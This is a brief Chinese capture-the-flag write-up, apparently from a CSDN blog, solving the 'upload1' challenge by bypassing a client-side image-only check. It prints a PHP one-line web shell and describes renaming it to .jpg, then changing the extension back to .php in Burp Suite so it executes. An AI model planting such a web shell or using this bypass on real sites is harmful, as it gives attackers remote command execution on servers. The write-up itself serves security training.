upload1
进入环境就一个上传,我们先上传一个普通的木马文件看看
木马内容
<?php @eval($_POST["cmd"]); ?>
估计是前端校验我们查看源码
只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可
然后访问木马文件执行指令即可
执行后查看源码便发现flag
标签:攻防,后缀,世界,jpg,源码,木马,upload1,上传
来源: https://blog.csdn.net/weixin_52268949/article/details/122755292